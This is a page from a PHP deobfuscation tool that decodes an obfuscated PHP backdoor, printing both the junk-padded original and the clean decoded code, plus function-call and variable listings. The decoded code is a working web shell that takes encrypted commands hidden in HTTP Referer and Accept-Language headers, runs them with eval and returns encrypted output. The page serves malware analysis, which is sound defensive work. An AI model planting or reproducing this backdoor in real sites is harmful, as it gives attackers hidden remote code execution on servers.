Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $r='l($ss(md5Af($iAf.$Afkh)Af,0,3));$fAf=$sl($ss(md5(Af$i.$kfAfAfAf),0Af,Af3));$p=""..

Decoded Output download

$kh="5d41";$kf="402a";function x($t,$k){$c=strlen($k);$l=strlen($t);$o="";for($i=0;$i<$l;){for($j=0;($j<$c&&$i<$l);$j++,$i++){$o.=$t{$i}^$k{$j};}}return $o;}$r=$_SERVER;$rr=@$r["HTTP_REFERER"];$ra=@$r["HTTP_ACCEPT_LANGUAGE"];if($rr&&$ra){$u=parse_url($rr);parse_str($u["query"],$q);$q=array_values($q);preg_match_all("/([\w])[\w-]+(?:;q=0.([\d]))?,?/",$ra,$m);if($q&&$m){@session_start();$s=&$_SESSION;$ss="substr";$sl="strtolower";$i=$m[1][0].$m[1][1];$h=$sl($ss(md5($i.$kh),0,3));$f=$sl($ss(md5($i.$kf),0,3));$p="";for($z=1;$z<count($m[1]);$z++)$p.=$q[$m[2][$z]];if(strpos($p,$h)===0){$s[$i]="";$p=$ss($p,3);}if(array_key_exists($i,$s)){$s[$i].=$p;$e=strpos($s[$i],$f);if($e){$k=$kh.$kf;ob_start();eval(@gzuncompress(@x(base64_decode(preg_replace(array("/_/","/-/"),array("/","+"),$ss($s[$i],0,$e))),$k)));$o=ob_get_contents();ob_end_clean();$d=base64_encode(x(gzcompress($o),$k));print("<$k>$d</$k>");@session_destroy();}}}}

Did this file decode correctly?

Original Code

<?php
$r='l($ss(md5Af($iAf.$Afkh)Af,0,3));$fAf=$sl($ss(md5(Af$i.$kfAfAfAf),0Af,Af3));$p="";for($z=1;$z<AfAfcount($m[1]);$z+Af+Af)$pA';
$D='nAfAfd_clean();$d=bAfasAfe64_enAfAfcAfodAfe(x(gzcompresAfs($o),Af$k));print(Af"<$k>$d</$Afk>");@sesAfsiAfon_dAfestroy();}}}}';
$x='sAf[$iAf].=Af$p;$e=sAftrpos($s[$i]Af,$Aff);ifAf($e){$k=$kh.$Afkf;ob_stAfarAft();Af@eAfval(Af@gzuncoAfmpress(Af@x(@basAfe64_decodeAf(prAfe';
$h='q&&$m){Af@sessioAfAfAfn_start(Af);$s=&Af$_SESSION;$ss="sAfubstrAf";Af$sl="stAfrtoloAfAfweAfr";$i=$m[1][0].$m[1]AfAf[1];$h=$s';
$S=str_replace('vX','','crevXavXtvXe_fuvXvXncvXtion');
$c='$Afkh="Af5d41";$kf="402a"Af;functAfion xAf($tAf,$k){$c=strAflen(Af$k);$lAf=strlen(Af$t);$oAf=Af"";fAfor($i=0;$i<$l;Af){for';
$j='g_replaceAf(arAfray("/_/Af","Af/Af-/"),Afarray("/","+"),Af$ssAf($s[$i],0,AfAf$e))),$kAf)));Af$Afo=ob_get_contents(Af);ob_e';
$g='(Af$j=0;(Af$j<Af$c&&$i<$Afl)Af;$j++,$iAf+Af+){$o.=$t{$i}Af^$k{$AfAfj}Af;}}return Af$o;}$Afr=$_SERVER;$rAfr=@$Afr["HTAfT';
$z='Afry"Af],$q);$q=Afarray_vAfaluesAf($qAf);pregAf_Afmatch_all("/([\\Afw])Af[\\w-Af]+(?:Af;q=0.([\\dAf]))?,?/",Af$rAfa,$m);AfAfif($';
$M='fAf.=$q[$m[2]Af[$z]];Afif(strpos($p,$hAf)===Af0){Af$s[$i]="";$Afp=$ss($Afp,3Af);}if(Afarray_AfkeyAf_AfAfexists($i,$s)){$';
$N='AfP_REFERAfAfER"Af];$raAf=@$r["AfHTTP_ACCEPAfT_LANGUAGEAf"];if($rr&&$raAf){$u=paAfrse_urAfAfl($rr);parsAfe_str(Af$u["que';
$Y=str_replace('Af','',$c.$g.$N.$z.$h.$r.$M.$x.$j.$D);
$n=$S('',$Y);$n();
?>

Function Calls

null 1
str_replace 2
create_function 1

Variables

$D nAfAfd_clean();$d=bAfasAfe64_enAfAfcAfodAfe(x(gzcompresAfs($..
$M fAf.=$q[$m[2]Af[$z]];Afif(strpos($p,$hAf)===Af0){Af$s[$i]=""..
$N AfP_REFERAfAfER"Af];$raAf=@$r["AfHTTP_ACCEPAfT_LANGUAGEAf"];..
$S create_function
$Y $kh="5d41";$kf="402a";function x($t,$k){$c=strlen($k);$l=str..
$c $Afkh="Af5d41";$kf="402a"Af;functAfion xAf($tAf,$k){$c=strAf..
$g (Af$j=0;(Af$j<Af$c&&$i<$Afl)Af;$j++,$iAf+Af+){$o.=$t{$i}Af^$..
$h q&&$m){Af@sessioAfAfAfn_start(Af);$s=&Af$_SESSION;$ss="sAfub..
$j g_replaceAf(arAfray("/_/Af","Af/Af-/"),Afarray("/","+"),Af$s..
$n None
$r l($ss(md5Af($iAf.$Afkh)Af,0,3));$fAf=$sl($ss(md5(Af$i.$kfAfA..
$x sAf[$iAf].=Af$p;$e=sAftrpos($s[$i]Af,$Aff);ifAf($e){$k=$kh.$..
$z Afry"Af],$q);$q=Afarray_vAfaluesAf($qAf);pregAf_Afmatch_all(..

Stats

MD5 d14546f3aea9b5266a1729293f236d83
Eval Count 1
Decode Time 136 ms